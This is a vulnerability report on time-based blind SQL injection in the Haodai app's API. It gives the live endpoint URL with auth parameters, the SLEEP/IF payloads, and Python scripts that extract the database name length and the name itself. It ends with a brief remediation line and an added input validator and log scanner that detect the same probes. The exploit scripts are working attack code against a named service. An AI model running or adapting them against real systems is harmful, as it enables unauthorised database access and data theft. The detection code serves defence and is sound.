SQL injection vulnerability in the Haodai (好贷网) APP
While testing Haodai's "Haodai APP" I found that the following URL is vulnerable to time-based blind SQL injection; the injectable parameter is: auth_did
http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2&imei=A0000000000000&app_version=27000&auth_tms=20150927122749&auth_did=218372&auth_dsig=7e63707f4c2c385c&auth_uid=402888&auth_usig=c28be912f3a53c23&pushcode=ed0e046ea6e40d71a4ba375cc010decd
SQLMap could not get anything out of it, so I looked at it by hand and found that the less-than and greater-than signs are filtered... so I wrote a Python program to run it:

1. Extracting the length of the database name:

Payload:
AND SLEEP(IF((SELECT LENGTH(DATABASE()))=1,5,0))

Script (the original was flattened onto one line; it is restored below as Python 3):

import requests, time

# Try every candidate length; the request that takes about 5 seconds longer reveals the true length.
for i in range(21):
    url = r'http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2&imei=A0000000000000&app_version=27000&auth_tms=20150927122749&auth_did=218372%20AND%20SLEEP%28IF%28%28SELECT%20LENGTH%28DATABASE%28%29%29%29=' + str(i) + ',5,0%29%29&auth_dsig=7e63707f4c2c385c&auth_uid=402888&auth_usig=c28be912f3a53c23&pushcode=ed0e046ea6e40d71a4ba375cc010decd'
    st = time.time()
    r = requests.get(url)
    print('Length:', i, time.time() - st)

Result: LENGTH(DATABASE()) = 16

2. Extracting the database name:

Payload:
AND SLEEP(IF(ascii(mid(database(),1,1))=1,5,0))

Script:

import requests, time

database = ''
# One position at a time; since < and > are filtered, each character is tested with = rather than by binary search.
for j in range(16):
    i = 33
    while i < 127:  # upper bound lost in extraction; printable ASCII (33..126) assumed
        url = r'http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2&imei=A0000000000000&app_version=27000&auth_tms=20150927122749&auth_did=218372 AND SLEEP(IF(ascii(mid(database(),' + str(j + 1) + ',1))=' + str(i) + ',10,0))&auth_dsig=7e63707f4c2c385c&auth_uid=402888&auth_usig=c28be912f3a53c23&pushcode=ed0e046ea6e40d71a4ba375cc010decd'
        st = time.time()
        r = requests.get(url)
        if time.time() - st > 10:
            database = database + chr(i)
            print('Database_name: ', database)
            break
        i = i + 1
Result: the database name is interface_hd_com
Remediation:
Filter and validate the parameter
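The probes above leave a clear trace at the API gateway: a numeric parameter that suddenly contains SQL, and a response time that jumps by the requested SLEEP. The following is an added example (not code from the original report) that shows both sides of the recommended fix, a strict validator that rejects any auth_did that is not a bounded run of digits, and a log scanner that flags such requests; it assumes a constructed log line format of "method target status response_ms", and the log lines themselves are constructed to mirror the report's requests.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines ("method target status response_ms"), modelled on
# the probes in the report above; these are not real server logs.
SAMPLE_LOG = """\
GET /capi/sys/up_push_code?os_type=1&appid=2&auth_did=218372&pushcode=abc 200 120
GET /capi/sys/up_push_code?os_type=1&appid=2&auth_did=218372%20AND%20SLEEP%28IF%28%28SELECT%20LENGTH%28DATABASE%28%29%29%29=16,5,0%29%29&pushcode=abc 200 5130
GET /capi/sys/up_push_code?os_type=1&appid=2&auth_did=218372+AND+SLEEP(IF(ascii(mid(database(),1,1))=105,10,0))&pushcode=abc 200 10042
GET /capi/sys/up_push_code?os_type=1&appid=2&auth_did=218373&pushcode=abc 200 98
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\d{3}) (\d+)$")
# Timing functions that have no business inside a numeric identifier.
TIME_FUNCS = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\s*\(", re.I)

def auth_did_is_valid(value):
    """Remediation: auth_did is an identifier, so accept only a bounded run of digits
    and reject everything else before it reaches the query."""
    return value.isdigit() and 1 <= len(value) <= 12

def scan_line(line, slow_ms=3000):
    """Detection: flag a request whose auth_did is not a plain integer or carries a
    timing function; record whether the server also took suspiciously long."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    _method, target, _status, ms = m.groups()
    params = parse_qs(urlsplit(target).query)   # percent-decodes, '+' becomes space
    did = params.get("auth_did", [""])[0]
    reasons = []
    if not auth_did_is_valid(did):
        reasons.append("auth_did not numeric")
    if TIME_FUNCS.search(did):
        reasons.append("timing function in auth_did")
    if reasons and int(ms) >= slow_ms:
        reasons.append("slow response")
    return {"auth_did": did, "ms": int(ms), "reasons": reasons} if reasons else None

def scan_log(text):
    """Return one finding per suspicious line, in log order."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The two benign lines produce no finding; the two probe lines are flagged on the parameter alone, and the response time corroborates that the injected SLEEP actually ran.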